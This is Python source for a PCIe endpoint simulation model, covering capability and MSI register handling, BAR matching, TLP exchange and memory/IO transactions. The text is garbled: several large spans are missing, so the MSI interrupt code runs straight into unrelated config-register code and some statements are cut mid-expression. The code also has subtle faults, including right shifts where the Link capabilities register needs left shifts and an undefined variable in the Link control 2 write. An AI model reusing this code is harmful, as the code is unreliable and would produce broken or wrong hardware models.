self.extended_tag_field_enable = False\n self.phantom_functions_enable = False\n self.aux_power_pm_enable = False\n self.enable_no_snoop = True\n self.max_read_request_size = 0x2\n # Device status\n self.correctable_error_detected = False\n self.nonfatal_error_detected = False\n self.fatal_error_detected = False\n self.unsupported_request_detected = False\n self.aux_power_detected = False\n self.transactions_pending = False\n # Link capabilities\n self.max_link_speed = 0\n self.max_link_width = 0\n self.aspm_support = 0\n self.l0s_exit_latency = 0\n self.l1_exit_latency = 0\n self.clock_power_management = False\n self.surprise_down_error_reporting_capability = False\n self.data_link_layer_link_active_reporting_capable = False\n self.link_bandwidth_notification_capability = False\n self.aspm_optionality_compliance = False\n self.port_number = 0\n # Link control\n self.aspm_control = 0\n self.read_completion_boundary = False\n self.link_disable = False\n self.common_clock_configuration = False\n self.extended_synch = False\n self.enable_clock_power_management = False\n self.hardware_autonomous_width_disable = False\n self.link_bandwidth_management_interrupt_enable = False\n self.link_autonomous_bandwidth_interrupt_enable = False\n # Link status\n self.current_link_speed = 0\n self.negotiated_link_width = 0\n self.link_training = False\n self.slot_clock_configuration = False\n self.data_link_layer_link_active = False\n self.link_bandwidth_management_status = False\n self.link_autonomous_bandwidth_status = False\n # Slot capabilities\n self.attention_button_present = False\n self.power_controller_present = False\n self.mrl_sensor_present = False\n self.attention_indicator_present = False\n self.power_indicator_present = False\n self.hot_plug_surprise = False\n self.hot_plug_capable = False\n self.slot_power_limit_value = 0\n self.slot_power_limit_scale = 0\n self.electromechanical_interlock_present = False\n self.no_command_completed_support = False\n self.physical_slot_number = 0\n # Slot control\n self.attention_button_pressed_enable = False\n self.power_fault_detected_enable = False\n self.mrl_sensor_changed_enable = False\n self.presence_detect_changed_enable = False\n self.command_completed_interrupt_enable = False\n self.hot_plug_interrupt_enable = False\n self.attention_indicator_control = 0\n self.power_indicator_control = 0\n self.power_controller_control = False\n self.electromechanical_interlock_control = False\n self.data_link_layer_state_changed_enable = False\n # Slot status\n self.attention_button_pressed = False\n self.power_fault_detected = False\n self.mrl_sensor_changed = False\n self.presence_detect_changed = False\n self.command_completed = False\n self.mrl_sensor_state = False\n self.presence_detect_state = False\n self.electromechanical_interlock_status = False\n self.data_link_layer_state_changed = False\n # Root control\n self.system_error_on_correctable_error_enable = False\n self.system_error_on_non_fatal_error_enable = False\n self.system_error_on_fatal_error_enable = False\n self.pme_interrupt_enable = False\n self.crs_software_visibility_enable = False\n # Root capabilities\n self.crs_software_visibility = False\n # Root status\n self.pme_requester_id = 0\n self.pme_status = False\n self.pme_pending = False\n # Device capabilities 2\n self.completion_timeout_ranges_supported = 0\n self.completion_timeout_disable_supported = False\n self.ari_forwarding_supported = False\n self.atomic_op_forwarding_supported = False\n self.atomic_op_32_bit_completer_supported = False\n self.atomic_op_64_bit_completer_supported = False\n self.cas_128_bit_completer_supported = False\n self.no_ro_enabled_pr_pr_passing = False\n self.ltr_mechanism_supported = False\n self.tph_completer_supported = 0\n self.obff_supported = 0\n self.extended_fmt_field_supported = False\n self.end_end_tlp_prefix_supported = False\n self.max_end_end_tlp_prefix = 0\n # Device control 2\n self.completion_timeout_value = 0\n self.completion_timeout_disable = False\n self.ari_forwarding_enable = False\n self.atomic_op_requester_enable = False\n self.atomic_op_egress_blocking = False\n self.ido_request_enable = False\n self.ido_completion_enable = False\n self.ltr_mechanism_enable = False\n self.obff_enable = 0\n self.end_end_tlp_prefix_blocking = False\n # Device status 2\n # Link capabilities 2\n self.supported_link_speeds = 0\n self.crosslink_supported = False\n # Link control 2\n self.target_link_speed = 0\n self.enter_compliance = False\n self.hardware_autonomous_speed_disable = False\n self.selectable_de_emphasis = False\n self.transmit_margin = 0\n self.enter_modified_compliance = False\n self.compliance_sos = False\n self.compliance_preset_de_emphasis = 0\n # Link status 2\n self.current_de_emphasis_level = False\n self.equalization_complete = False\n self.equalization_phase_1_successful = False\n self.equalization_phase_2_successful = False\n self.equalization_phase_3_successful = False\n self.link_equalization_request = False\n # Slot capabilities 2\n # Slot control 2\n # Slot status 2\n\n self.register_capability(PCIE_CAP_ID, PCIE_CAP_LEN, self.read_pcie_cap_register, self.write_pcie_cap_register)\n\n \"\"\"\n PCIe Capability\n\n 31 0\n +---------------------------------+----------------+----------------+\n | PCIe Capabilities | Next Cap | PCIe Cap | 0 0x00\n +---------------------------------+----------------+----------------+\n | Device Capabilities | 1 0x04\n +---------------------------------+---------------------------------+\n | Device Status | Device Control | 2 0x08\n +---------------------------------+----------------+----------------+\n | Link Capabilities | 3 0x0C\n +---------------------------------+---------------------------------+\n | Link Status | Link Control | 4 0x10\n +---------------------------------+---------------------------------+\n | Slot Capabilities | 5 0x14\n +---------------------------------+---------------------------------+\n | Slot Status | Slot Control | 6 0x18\n +---------------------------------+---------------------------------+\n | Root Capabilities | Root Control | 7 0x1C\n +---------------------------------+---------------------------------+\n | Root status | 8 0x20\n +---------------------------------+---------------------------------+\n | Device Capabilities 2 | 9 0x24\n +---------------------------------+---------------------------------+\n | Device Status 2 | Device Control 2 | 10 0x28\n +---------------------------------+----------------+----------------+\n | Link Capabilities 2 | 11 0x2C\n +---------------------------------+---------------------------------+\n | Link Status 2 | Link Control 2 | 12 0x30\n +---------------------------------+---------------------------------+\n | Slot Capabilities 2 | 13 0x34\n +---------------------------------+---------------------------------+\n | Slot Status 2 | Slot Control 2 | 14 0x38\n +---------------------------------+---------------------------------+\n \"\"\"\n def read_pcie_cap_register(self, reg):\n if reg == 0:\n # PCIe capabilities\n val = 2 << 16\n val |= (self.pcie_device_type & 0xf) << 20\n if self.pcie_slot_implemented: val |= 1 << 24\n val |= (self.interrupt_message_number & 0x1f) << 25\n return val\n elif reg == 1:\n # Device capabilities\n val = self.max_payload_size_supported & 0x7\n val |= (self.phantom_functions_supported & 0x3) << 3\n if self.extended_tag_supported: val |= 1 << 5\n val |= (self.endpoint_l0s_acceptable_latency & 0x7) << 6\n val |= (self.endpoint_l1_acceptable_latency & 7) << 9\n if self.role_based_error_reporting: val |= 1 << 15\n val |= (self.captured_slot_power_limit_value & 0xff) << 18\n val |= (self.captured_slot_power_limit_scale & 0x3) << 26\n if self.function_level_reset_capability: val |= 1 << 28\n return val\n elif reg == 2:\n val = 0\n # Device control\n if self.correctable_error_reporting_enable: val |= 1 << 0\n if self.non_fatal_error_reporting_enable: val |= 1 << 1\n if self.fatal_error_reporting_enable: val |= 1 << 2\n if self.unsupported_request_reporting_enable: val |= 1 << 3\n if self.enable_relaxed_ordering: val |= 1 << 4\n val |= (self.max_payload_size & 0x7) << 5\n if self.extended_tag_field_enable: val |= 1 << 8\n if self.phantom_functions_enable: val |= 1 << 9\n if self.aux_power_pm_enable: val |= 1 << 10\n if self.enable_no_snoop: val |= 1 << 11\n val |= (self.max_read_request_size & 0x7) << 12\n # Device status\n if self.correctable_error_detected: val |= 1 << 16\n if self.nonfatal_error_detected: val |= 1 << 17\n if self.fatal_error_detected: val |= 1 << 18\n if self.unsupported_request_detected: val |= 1 << 19\n if self.aux_power_detected: val |= 1 << 20\n if self.transactions_pending: val |= 1 << 21\n return val\n elif reg == 3:\n # Link capabilities\n val = self.max_link_speed & 0xf\n val |= (self.max_link_width & 0x3f) >> 4\n val |= (self.aspm_support & 0x3) >> 10\n val |= (self.l0s_exit_latency & 0x7) >> 12\n val |= (self.l1_exit_latency & 0x7) >> 15\n if self.clock_power_management: val |= 1 << 18\n if self.surprise_down_error_reporting_capability: val |= 1 << 19\n if self.data_link_layer_link_active_reporting_capable: val |= 1 << 20\n if self.link_bandwidth_notification_capability: val |= 1 << 21\n if self.aspm_optionality_compliance: val |= 1 << 22\n val |= (self.port_number & 0xff) << 24\n return val\n elif reg == 4:\n # Link control\n val = self.aspm_control & 0x3\n if self.read_completion_boundary: val |= 1 << 3\n if self.link_disable: val |= 1 << 4\n if self.common_clock_configuration: val |= 1 << 6\n if self.extended_synch: val |= 1 << 7\n if self.enable_clock_power_management: val |= 1 << 8\n if self.hardware_autonomous_width_disable: val |= 1 << 9\n if self.link_bandwidth_management_interrupt_enable: val |= 1 << 10\n if self.link_autonomous_bandwidth_interrupt_enable: val |= 1 << 11\n # Link status\n val |= (self.current_link_speed & 0xf) << 16\n val |= (self.negotiated_link_width & 0x3f) << 20\n if self.link_training: val |= 1 << 27\n if self.slot_clock_configuration: val |= 1 << 28\n if self.data_link_layer_link_active: val |= 1 << 29\n if self.link_bandwidth_management_status: val |= 1 << 30\n if self.link_autonomous_bandwidth_status: val |= 1 << 31\n return val\n elif reg == 5:\n # Slot capabilities\n val = 0\n if self.attention_button_present: val |= 1\n if self.power_controller_present: val |= 1 << 1\n if self.mrl_sensor_present: val |= 1 << 2\n if self.attention_indicator_present: val |= 1 << 3\n if self.power_indicator_present: val |= 1 << 4\n if self.hot_plug_surprise: val |= 1 << 5\n if self.hot_plug_capable: val |= 1 << 6\n val |= (self.slot_power_limit_value & 0xff) << 7\n val |= (self.slot_power_limit_scale & 0x3) << 15\n if self.electromechanical_interlock_present: val |= 1 << 17\n if self.no_command_completed_support: val |= 1 << 18\n val |= (self.physical_slot_number & 0x1fff) << 19\n return val\n elif reg == 6:\n # Slot control\n val = 0\n if self.attention_button_pressed_enable: val |= 1 << 0\n if self.power_fault_detected_enable: val |= 1 << 1\n if self.mrl_sensor_changed_enable: val |= 1 << 2\n if self.presence_detect_changed_enable: val |= 1 << 3\n if self.command_completed_interrupt_enable: val |= 1 << 4\n if self.hot_plug_interrupt_enable: val |= 1 << 5\n val |= (self.attention_indicator_control & 0x3) << 6\n val |= (self.power_indicator_control & 0x3) << 8\n if self.power_controller_control: val |= 1 << 10\n if self.electromechanical_interlock_control: val |= 1 << 11\n if self.data_link_layer_state_changed_enable: val |= 1 << 12\n # Slot status\n if self.attention_button_pressed: val |= 1 << 16\n if self.power_fault_detected: val |= 1 << 17\n if self.mrl_sensor_changed: val |= 1 << 18\n if self.presence_detect_changed: val |= 1 << 19\n if self.command_completed: val |= 1 << 20\n if self.mrl_sensor_state: val |= 1 << 21\n if self.presence_detect_state: val |= 1 << 22\n if self.electromechanical_interlock_status: val |= 1 << 23\n if self.data_link_layer_state_changed: val |= 1 << 24\n return val\n elif reg == 7:\n # Root control\n val = 0\n if self.system_error_on_correctable_error_enable: val |= 1 << 0\n if self.system_error_on_non_fatal_error_enable: val |= 1 << 1\n if self.system_error_on_fatal_error_enable: val |= 1 << 2\n if self.pme_interrupt_enable: val |= 1 << 3\n if self.crs_software_visibility_enable: val |= 1 << 4\n # Root capabilities\n if self.crs_software_visibility: val |= 1 << 16\n return val\n elif reg == 8:\n # Root status\n val = self.pme_requester_id & 0xffff\n if self.pme_status: val |= 1 << 16\n if self.pme_pending: val |= 1 << 17\n return val\n elif reg == 9:\n # Device capabilities 2\n val = self.completion_timeout_ranges_supported & 0xf\n if self.completion_timeout_disable_supported: val |= 1 << 4\n if self.ari_forwarding_supported: val |= 1 << 5\n if self.atomic_op_forwarding_supported: val |= 1 << 6\n if self.atomic_op_32_bit_completer_supported: val |= 1 << 7\n if self.atomic_op_64_bit_completer_supported: val |= 1 << 8\n if self.cas_128_bit_completer_supported: val |= 1 << 9\n if self.no_ro_enabled_pr_pr_passing: val |= 1 << 10\n if self.ltr_mechanism_supported: val |= 1 << 11\n val |= (self.tph_completer_supported & 0x3) << 12\n val |= (self.obff_supported & 0x3) << 18\n if self.extended_fmt_field_supported: val |= 1 << 20\n if self.end_end_tlp_prefix_supported: val |= 1 << 21\n val |= (self.max_end_end_tlp_prefix & 0x3) << 22\n return val\n elif reg == 10:\n # Device control 2\n val = self.completion_timeout_value & 0xf\n if self.completion_timeout_disable: val |= 1 << 4\n if self.ari_forwarding_enable: val |= 1 << 5\n if self.atomic_op_requester_enable: val |= 1 << 6\n if self.atomic_op_egress_blocking: val |= 1 << 7\n if self.ido_request_enable: val |= 1 << 8\n if self.ido_completion_enable: val |= 1 << 9\n if self.ltr_mechanism_enable: val |= 1 << 10\n val |= (self.obff_enable & 0x3) << 13\n if self.end_end_tlp_prefix_blocking: val |= 1 << 15\n # Device status 2\n return val\n elif reg == 11:\n # Link capabilities 2\n val = (self.supported_link_speeds & 0x7f) << 1\n if self.crosslink_supported: val |= 1 << 8\n return val\n elif reg == 12:\n # Link control 2\n val = self.target_link_speed & 0xf\n if self.enter_compliance: val |= 1 << 4\n if self.hardware_autonomous_speed_disable: val |= 1 << 5\n if self.selectable_de_emphasis: val |= 1 << 6\n val |= (self.transmit_margin & 0x7) << 7\n if self.enter_modified_compliance: val |= 1 << 10\n if self.compliance_sos: val |= 1 << 11\n val |= (self.compliance_preset_de_emphasis & 0xf) << 12\n # Link status 2\n if self.current_de_emphasis_level: val |= 1 << 16\n if self.equalization_complete: val |= 1 << 17\n if self.equalization_phase_1_successful: val |= 1 << 18\n if self.equalization_phase_2_successful: val |= 1 << 19\n if self.equalization_phase_3_successful: val |= 1 << 20\n if self.link_equalization_request: val |= 1 << 21\n return val\n else:\n return 0\n\n def write_pcie_cap_register(self, reg, data, mask):\n if reg == 2:\n # Device control\n if mask & 0x1: self.correctable_error_reporting_enable = (data & 1 << 0 != 0)\n if mask & 0x1: self.non_fatal_error_reporting_enable = (data & 1 << 1 != 0)\n if mask & 0x1: self.fatal_error_reporting_enable = (data & 1 << 2 != 0)\n if mask & 0x1: self.unsupported_request_reporting_enable = (data & 1 << 3 != 0)\n if mask & 0x1: self.enable_relaxed_ordering = (data & 1 << 4 != 0)\n if mask & 0x1: self.max_payload_size = (data >> 5) & 0x7\n if mask & 0x2: self.extended_tag_field_enable = (data & 1 << 8 != 0)\n if mask & 0x2: self.phantom_functions_enable = (data & 1 << 9 != 0)\n if mask & 0x2: self.aux_power_pm_enable = (data & 1 << 10 != 0)\n if mask & 0x2: self.enable_no_snoop = (data & 1 << 11 != 0)\n if mask & 0x2: self.max_read_request_size = (data >> 12) & 0x7\n if mask & 0x2 and data & 1 << 15: self.initiate_function_level_reset()\n # Device status\n if mask & 0x4 and data & 1 << 16: self.correctable_error_detected = False\n if mask & 0x4 and data & 1 << 17: self.nonfatal_error_detected = False\n if mask & 0x4 and data & 1 << 18: self.fatal_error_detected = False\n if mask & 0x4 and data & 1 << 19: self.unsupported_request_detected = False\n if mask & 0x4 and data & 1 << 20: self.aux_power_detected = False\n if mask & 0x4 and data & 1 << 21: self.transactions_pending = False\n elif reg == 4:\n # Link control\n if mask & 0x1: self.aspm_control = data & 3\n if mask & 0x1: self.read_completion_boundary = (data & 1 << 4 != 0)\n if mask & 0x1 and data & 1 << 5: self.initiate_retrain_link()\n if mask & 0x1: self.common_clock_configuration = (data & 1 << 6 != 0)\n if mask & 0x1: self.extended_synch = (data & 1 << 7 != 0)\n if mask & 0x2: self.enable_clock_power_management = (data & 1 << 8 != 0)\n if mask & 0x2: self.hardware_autonomous_width_disable = (data & 1 << 9 != 0)\n if mask & 0x2: self.link_bandwidth_management_interrupt_enable = (data & 1 << 10 != 0)\n if mask & 0x2: self.link_autonomous_bandwidth_interrupt_enable = (data & 1 << 11 != 0)\n # Link status\n if mask & 0x8 and data & 1 << 30: self.link_bandwidth_management_status = False\n if mask & 0x8 and data & 1 << 31: self.link_autonomous_bandwidth_status = False\n elif reg == 6:\n # Slot control\n if mask & 0x1: self.attention_button_pressed_enable = (data & 1 << 0 != 0)\n if mask & 0x1: self.power_fault_detected_enable = (data & 1 << 1 != 0)\n if mask & 0x1: self.mrl_sensor_changed_enable = (data & 1 << 2 != 0)\n if mask & 0x1: self.presence_detect_changed_enable = (data & 1 << 3 != 0)\n if mask & 0x1: self.command_completed_interrupt_enable = (data & 1 << 4 != 0)\n if mask & 0x1: self.hot_plug_interrupt_enable = (data & 1 << 5 != 0)\n if mask & 0x1: self.attention_indicator_control = (data >> 6) & 0x3\n if mask & 0x2: self.power_indicator_control = (data >> 8) & 0x3\n if mask & 0x2: self.power_controller_control = (data & 1 << 10 != 0)\n if mask & 0x2: self.electromechanical_interlock_control = (data & 1 << 11 != 0)\n if mask & 0x2: self.data_link_layer_state_changed_enable = (data & 1 << 12 != 0)\n # Slot status\n if mask & 0x4 and data & 1 << 16: self.attention_button_pressed = False\n if mask & 0x4 and data & 1 << 17: self.power_fault_detected = False\n if mask & 0x4 and data & 1 << 18: self.mrl_sensor_changed = False\n if mask & 0x4 and data & 1 << 19: self.presence_detect_changed = False\n if mask & 0x4 and data & 1 << 20: self.command_completed = False\n if mask & 0x8 and data & 1 << 24: self.data_link_layer_state_changed = False\n elif reg == 7:\n # Root control\n if mask & 0x1: self.system_error_on_correctable_error_enable = (data & 1 << 0 != 0)\n if mask & 0x1: self.system_error_on_non_fatal_error_enable = (data & 1 << 1 != 0)\n if mask & 0x1: self.system_error_on_fatal_error_enable = (data & 1 << 2 != 0)\n if mask & 0x1: self.pme_interrupt_enable = (data & 1 << 3 != 0)\n if mask & 0x1: self.crs_software_visibility_enable = (data & 1 << 4 != 0)\n elif reg == 8:\n # Root status\n if mask & 0x4 and data & 1 << 16: self.pme_status = False\n elif reg == 10:\n # Device control 2\n if mask & 0x1: self.completion_timeout_value = data & 0xf\n if mask & 0x1: self.completion_timeout_disable = (data & 1 << 4 != 0)\n if mask & 0x1: self.ari_forwarding_enable = (data & 1 << 5 != 0)\n if mask & 0x1: self.atomic_op_requester_enable = (data & 1 << 6 != 0)\n if mask & 0x1: self.atomic_op_egress_blocking = (data & 1 << 7 != 0)\n if mask & 0x2: self.ido_request_enable = (data & 1 << 8 != 0)\n if mask & 0x2: self.ido_completion_enable = (data & 1 << 9 != 0)\n if mask & 0x2: self.ltr_mechanism_enable = (data & 1 << 10 != 0)\n if mask & 0x2: self.obff_enable = (data >> 13) & 0x3\n if mask & 0x2: self.end_end_tlp_prefix_blocking = (data & 1 << 15 != 0)\n # Device status 2\n elif reg == 12:\n # Link control 2\n if mask & 0x1: self.target_link_speed = data & 0xf\n if mask & 0x1: self.enter_compliance = (data & 1 << 4 != 0)\n if mask & 0x1: self.hardware_autonomous_speed_disable = (data & 1 << 5 != 0)\n if mask & 0x1: self.transmit_margin = self.transmit_margin & 0x6 | (data >> 7) & 0x1\n if mask & 0x2: self.transmit_margin = self.transmit_margin & 0x1 | (data >> 7) & 0x6\n if mask & 0x2: self.enter_modified_compliance = (data & 1 << 10 != 0)\n if mask & 0x2: self.compliance_sos = (data & 1 << 11 != 0)\n if mask & 0x2: self.compliance_preset_de_emphasis = (data >> 12) & 0xff\n # Link status 2\n if self.link_equalization_request: val |= 1 << 21\n\n def initiate_function_level_reset(self):\n pass\n\n def initiate_retrain_link(self):\n pass\n\n\nclass MSICapability(object):\n def __init__(self, *args, **kwargs):\n super(MSICapability, self).__init__(*args, **kwargs)\n\n # MSI Capability Registers\n self.msi_enable = False\n self.msi_multiple_message_capable = 0\n self.msi_multiple_message_enable = 0\n self.msi_64bit_address_capable = 0\n self.msi_per_vector_mask_capable = 0\n self.msi_message_address = 0\n self.msi_message_data = 0\n self.msi_mask_bits = 0\n self.msi_pending_bits = 0\n\n self.register_capability(MSI_CAP_ID, MSI_CAP_LEN, self.read_msi_cap_register, self.write_msi_cap_register)\n\n \"\"\"\n MSI Capability (32 bit)\n\n 31 0\n +---------------------------------+----------------+----------------+\n | Message Control | Next Cap | Cap ID | 0 0x00\n +---------------------------------+----------------+----------------+\n | Message Address | 1 0x04\n +---------------------------------+---------------------------------+\n | | Message Data | 2 0x08\n +---------------------------------+---------------------------------+\n\n MSI Capability (64 bit)\n\n 31 0\n +---------------------------------+----------------+----------------+\n | Message Control | Next Cap | Cap ID | 0 0x00\n +---------------------------------+----------------+----------------+\n | Message Address | 1 0x04\n +-------------------------------------------------------------------+\n | Message Upper Address | 2 0x08\n +---------------------------------+---------------------------------+\n | | Message Data | 3 0x0C\n +---------------------------------+---------------------------------+\n\n MSI Capability (32 bit with per-vector masking)\n\n 31 0\n +---------------------------------+----------------+----------------+\n | Message Control | Next Cap | Cap ID | 0 0x00\n +---------------------------------+----------------+----------------+\n | Message Address | 1 0x04\n +-------------------------------------------------------------------+\n | | Message Data | 2 0x08\n +---------------------------------+---------------------------------+\n | Mask Bits | 3 0x0C\n +-------------------------------------------------------------------+\n | Pending Bits | 4 0x10\n +-------------------------------------------------------------------+\n\n MSI Capability (64 bit with per-vector masking)\n\n 31 0\n +---------------------------------+----------------+----------------+\n | Message Control | Next Cap | Cap ID | 0 0x00\n +---------------------------------+----------------+----------------+\n | Message Address | 1 0x04\n +-------------------------------------------------------------------+\n | Message Upper Address | 2 0x08\n +---------------------------------+---------------------------------+\n | | Message Data | 3 0x0C\n +---------------------------------+---------------------------------+\n | Mask Bits | 4 0x10\n +-------------------------------------------------------------------+\n | Pending Bits | 5 0x14\n +-------------------------------------------------------------------+\n \"\"\"\n def read_msi_cap_register(self, reg):\n if reg == 0:\n # Message control\n val = 0x00000000\n if self.msi_enable: val |= 1 << 16\n val |= (self.msi_multiple_message_capable & 0x7) << 17\n val |= (self.msi_multiple_message_enable & 0x7) << 20\n if self.msi_64bit_address_capable: val |= 1 << 23\n if self.msi_per_vector_mask_capable: val |= 1 << 24\n return val\n elif reg == 1:\n # Message address\n return self.msi_message_address & 0xfffffffc\n elif reg == 2 and self.msi_64bit_address_capable:\n # Message upper address\n return (self.msi_message_address >> 32) & 0xffffffff\n elif reg == (3 if self.msi_64bit_address_capable else 2):\n # Message data\n return self.msi_message_data & 0xffff\n elif reg == (4 if self.msi_64bit_address_capable else 3) and self.msi_per_vector_mask_capable:\n # Mask bits\n return self.msi_mask_bits & 0xffffffff\n elif reg == (5 if self.msi_64bit_address_capable else 4) and self.msi_per_vector_mask_capable:\n # Pending bits\n return self.msi_pending_bits & 0xffffffff\n\n def write_msi_cap_register(self, reg, data, mask):\n if reg == 0:\n # Message control\n if mask & 0x4: self.msi_enable = (data & 1 << 16 != 0)\n if mask & 0x4: self.msi_multiple_message_enable = (data >> 20) & 0x7\n elif reg == 1:\n # Message address\n self.msi_message_address = byte_mask_update(self.msi_message_address, mask, data) & 0xfffffffffffffffc\n elif reg == 2 and self.msi_64bit_address_capable:\n # Message upper address\n self.msi_message_address = byte_mask_update(self.msi_message_address, mask << 4, data << 32) & 0xfffffffffffffffc\n elif reg == (3 if self.msi_64bit_address_capable else 2):\n # Message data\n self.msi_message_data = byte_mask_update(self.msi_message_data, mask & 0x3, data) & 0xffff\n elif reg == (4 if self.msi_64bit_address_capable else 3) and self.msi_per_vector_mask_capable:\n # Mask bits\n self.msi_mask_bits = byte_mask_update(self.msi_mask_bits, mask, data) & 0xffffffff\n\n def issue_msi_interrupt(self, number=0, attr=0, tc=0):\n if not self.msi_enable:\n print(\"MSI disabled\")\n return\n if number < 0 or number >= 2**self.msi_multiple_message_enable or number >= 2**self.msi_multiple_message_capable:\n print(\"MSI message number out of range\")\n return\n\n data = self.msi_message_data & ~(2**self.msi_multiple_message_enable-1) | number\n yield from self.mem_write(self.msi_message_address, struct.pack('> 1) & 1, data >> 8)\n self.bist = byte_mask_update(self.bist, (mask >> 3) & 1, data >> 24)\n elif reg == 15:\n self.intr_line = byte_mask_update(self.intr_line, mask & 1, data)\n self.intr_pin = byte_mask_update(self.intr_pin, (mask >> 1) & 1, data >> 8)\n elif 16 <= reg < 256: self.write_capability_register(reg, data, mask)\n elif 256 <= reg < 4096: self.write_extended_capability_register(reg, data, mask)\n\n def read_capability_register(self, reg):\n return self.capabilities.read_register(reg)\n\n def write_capability_register(self, reg, data, mask):\n self.capabilities.write_register(reg, data, mask)\n\n def register_capability(self, cap_id, length=None, read=None, write=None, offset=None):\n self.capabilities.register(cap_id, 0, length, read, write, offset)\n if self.capabilities.list:\n self.cap_ptr = self.capabilities.list[0].offset*4\n else:\n self.cap_ptr = 0\n\n def read_extended_capability_register(self, reg):\n return self.ext_capabilities.read_register(reg)\n\n def write_extended_capability_register(self, reg, data, mask):\n self.ext_capabilities.write_register(reg, data, mask)\n\n def register_extended_capability(self, cap_id, cap_ver, length=None, read=None, write=None, offset=None):\n self.ext_capabilities.register(cap_id, cap_ver, length, read, write, offset)\n\n def configure_bar(self, idx, size, ext=False, prefetch=False, io=False):\n mask = 2**math.ceil(math.log(size, 2))-1\n\n if idx >= len(self.bar) or (ext and idx+1 >= len(self.bar)):\n raise Exception(\"BAR index out of range\")\n\n if io:\n self.bar[idx] = 1\n self.bar_mask[idx] = 0xfffffffc & ~mask\n else:\n self.bar[idx] = 0\n self.bar_mask[idx] = 0xfffffff0 & ~mask\n\n if ext:\n self.bar[idx] |= 4\n self.bar[idx+1] = 0\n self.bar_mask[idx+1] = 0xffffffff & (~mask >> 32)\n\n if prefetch:\n self.bar[idx] |= 8\n\n def match_bar(self, addr, io=False):\n m = []\n bar = 0\n while bar < len(self.bar):\n bar_val = self.bar[bar]\n bar_mask = self.bar_mask[bar]\n\n orig_bar = bar\n bar += 1\n\n if bar_mask == 0:\n # unimplemented BAR\n continue\n\n if bar_val & 1:\n # IO BAR\n\n if io and addr & bar_mask == bar_val & bar_mask:\n m.append((orig_bar, addr & ~bar_mask))\n\n else:\n # Memory BAR\n\n if bar_val & 4:\n # 64 bit BAR\n\n if bar >= len(self.bar):\n raise Exception(\"Final BAR marked as 64 bit, but no extension BAR available\")\n\n bar_val |= self.bar[bar] << 32\n bar_mask |= self.bar_mask[bar] << 32\n\n bar += 1\n\n if not io and addr & bar_mask == bar_val & bar_mask:\n m.append((orig_bar, addr & ~bar_mask))\n\n return m\n\n def upstream_send(self, tlp):\n # logging\n print(\"[%s] Sending upstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n if self.upstream_tx_handler is None:\n raise Exception(\"Transmit handler not set\")\n yield from self.upstream_tx_handler(tlp)\n\n def send(self, tlp):\n yield from self.upstream_send(tlp)\n\n def upstream_recv(self, tlp):\n # logging\n print(\"[%s] Got downstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n yield from self.handle_tlp(tlp)\n\n def handle_tlp(self, tlp):\n if (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n self.rx_cpl_queues[tlp.tag].append(tlp)\n self.rx_cpl_sync[tlp.tag].next = not self.rx_cpl_sync[tlp.tag]\n elif tlp.fmt_type in self.rx_tlp_handler:\n yield self.rx_tlp_handler[tlp.fmt_type](tlp)\n else:\n raise Exception(\"Unhandled TLP\")\n\n def register_rx_tlp_handler(self, fmt_type, func):\n self.rx_tlp_handler[fmt_type] = func\n\n def recv_cpl(self, tag, timeout=0):\n queue = self.rx_cpl_queues[tag]\n sync = self.rx_cpl_sync[tag]\n\n if timeout:\n yield sync, delay(timeout)\n else:\n yield sync\n\n if queue:\n return queue.pop(0)\n\n return None\n\n def get_free_tag(self):\n tag_count = 256 if self.extended_tag_field_enable else 32\n\n for k in range(tag_count):\n self.current_tag = (self.current_tag + 1) % tag_count\n if not self.rx_cpl_queues[self.current_tag]:\n return self.current_tag\n\n return None\n\n def handle_config_0_tlp(self, tlp):\n if tlp.dest_id.device == self.device_num and tlp.dest_id.function == self.function_num:\n # logging\n print(\"[%s] Config type 0 for me\" % (highlight(self.get_desc())))\n\n # capture address information\n self.bus_num = tlp.dest_id.bus\n\n # prepare completion TLP\n cpl = TLP()\n\n # perform operation\n if tlp.fmt_type == TLP_CFG_READ_0:\n cpl.set_completion_data(tlp, self.get_id())\n cpl.data = [self.read_config_register(tlp.register_number)]\n cpl.byte_count = 4\n cpl.length = 1\n elif tlp.fmt_type == TLP_CFG_WRITE_0:\n cpl.set_completion(tlp, self.get_id())\n self.write_config_register(tlp.register_number, tlp.data[0], tlp.first_be)\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.upstream_send(cpl)\n else:\n # error\n pass\n\n def io_read(self, addr, length, timeout=0):\n n = 0\n data = b''\n\n if not self.bus_master_enable:\n print(\"Bus mastering not enabled\")\n return None\n\n while n < length:\n tlp = TLP()\n tlp.fmt_type = TLP_IO_READ\n tlp.requester_id = self.get_id()\n tlp.tag = self.get_free_tag()\n\n first_pad = addr % 4\n byte_length = min(length-n, 4-first_pad)\n tlp.set_be(addr, byte_length)\n\n yield from self.send(tlp)\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl:\n raise Exception(\"Timeout\")\n if cpl.status != CPL_STATUS_SC:\n raise Exception(\"Unsuccessful completion\")\n else:\n assert cpl.length == 1\n d = struct.pack(' 0xffffffff:\n tlp.fmt_type = TLP_MEM_READ_64\n else:\n tlp.fmt_type = TLP_MEM_READ\n tlp.requester_id = self.get_id()\n tlp.tag = self.get_free_tag()\n tlp.attr = attr\n tlp.tc = tc\n\n first_pad = addr % 4\n byte_length = length-n\n byte_length = min(byte_length, (128 << self.max_read_request_size)-first_pad) # max read request size\n byte_length = min(byte_length, 0x1000 - (addr & 0xfff)) # 4k align\n tlp.set_be(addr, length)\n\n yield from self.send(tlp)\n\n m = 0\n\n while m < byte_length:\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl:\n raise Exception(\"Timeout\")\n if cpl.status != CPL_STATUS_SC:\n raise Exception(\"Unsuccessful completion\")\n else:\n assert cpl.byte_count+3+(cpl.lower_address&3) >= cpl.length*4\n assert cpl.byte_count == byte_length - m\n\n d = bytearray()\n\n for k in range(cpl.length):\n d.extend(struct.pack(' 0xffffffff:\n tlp.fmt_type = TLP_MEM_WRITE_64\n else:\n tlp.fmt_type = TLP_MEM_WRITE\n tlp.requester_id = self.get_id()\n tlp.attr = attr\n tlp.tc = tc\n\n first_pad = addr % 4\n byte_length = len(data)-n\n byte_length = min(byte_length, (128 << self.max_payload_size)-first_pad) # max payload size\n byte_length = 